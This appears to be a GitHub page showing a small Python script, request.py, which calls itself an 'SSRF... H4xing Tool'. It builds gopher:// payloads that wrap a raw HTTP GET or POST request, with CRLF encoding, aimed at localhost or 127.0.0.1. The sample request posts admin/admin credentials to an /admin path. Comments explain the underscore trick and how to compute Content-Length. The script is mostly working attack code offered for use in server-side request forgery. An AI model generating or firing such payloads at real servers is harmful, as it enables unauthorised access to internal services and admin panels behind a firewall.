-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathrequest.py
More file actions
78 lines (70 loc) · 3.41 KB
/
request.py
File metadata and controls
78 lines (70 loc) · 3.41 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#
# Gopher HTTP requests (POST/GET) | By: Liquidsky
#
# URL: gopher: // <host>:<port>/<gopher-path>_ followed by TCP data stream
#
# Be careful not to forget the underscore "_" at the end. The TCP data stream begins after the underscore "_". If you do not add this "_", the message received by the server will not be complete. You can write this character at will.
#
# Tip for determing POST request length:
#
#└─$ echo "username=admin&password=admin" | wc -c
# Output= 30
# Subtract 1 from this result. = 29 -> Then add this to content length header.
#
import urllib.parse
# The GET and POST request will be modified to match the target site.
# Get request Gopher payload -> Make sure you update the GET request
GETrequest = \
"""GET / HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
"""
# POST request Gopher payload -> Make sure you update the POST request
POSTrequest = \
"""POST /admin HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
username=admin&password=admin
"""
ans=True
while ans:
print ("""
/$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$$ /$$$$$$$ /$$
/$$__ $$ /$$__ $$| $$__ $$| $$_____/ | $$__ $$ | $$
| $$ \__/| $$ \__/| $$ \ $$| $$ | $$ \ $$ /$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$
| $$$$$$ | $$$$$$ | $$$$$$$/| $$$$$ | $$$$$$$/ /$$__ $$ /$$__ $$| $$ | $$ /$$__ $$ /$$_____/|_ $$_/ /$$_____/
\____ $$ \____ $$| $$__ $$| $$__/ | $$__ $$| $$$$$$$$| $$ \ $$| $$ | $$| $$$$$$$$| $$$$$$ | $$ | $$$$$$
/$$ \ $$ /$$ \ $$| $$ \ $$| $$ | $$ \ $$| $$_____/| $$ | $$| $$ | $$| $$_____/ \____ $$ | $$ /$$\____ $$
| $$$$$$/| $$$$$$/| $$ | $$| $$ | $$ | $$| $$$$$$$| $$$$$$$| $$$$$$/| $$$$$$$ /$$$$$$$/ | $$$$//$$$$$$$/
\______/ \______/ |__/ |__/|__/ |__/ |__/ \_______/ \____ $$ \______/ \_______/|_______/ \___/ |_______/
| $$
| $$ By: Liquidsky
|__/
~-( SSRF... HTTP based (GET/POST) gopher requests. )-~ - H4xing Tool
""")
print ("""
1. Gopher GET Request
2. Gopher POST Request
""")
ans=input("[*] Please select GET (1) or POST (2) request: ")
if ans=="1":
print("[x] Gopher GET Request: ")
tmp = urllib.parse. quote(GETrequest)
new = tmp.replace('%0A','%0D%0A' )
result = 'gopher://localhost:80/'+'_'+ new
print (result)
print
print ("[!] Cheers m8, Press [Enter] to Exit ^_~")
elif ans=="2":
print("[?] Informational: The four HTTP headers above are required for POST requests, namely POST, Host, Content-Type and Content-Length. If it is missing, an error will be reported, but GET does not use it.")
print("[x] Gopher POST Request: ")
tmp = urllib.parse. quote(POSTrequest)
new = tmp.replace('%0A','%0D%0A' )
result = 'gopher://127.0.0.1:80/'+'_'+ new
print (result)
print
print ("[!] Cheers m8, Press [Enter] to Exit ^_~")
elif ans !="":
print("[!] Not Valid Choice Try again")
print("[?] Press CTRL+C or Enter to exit")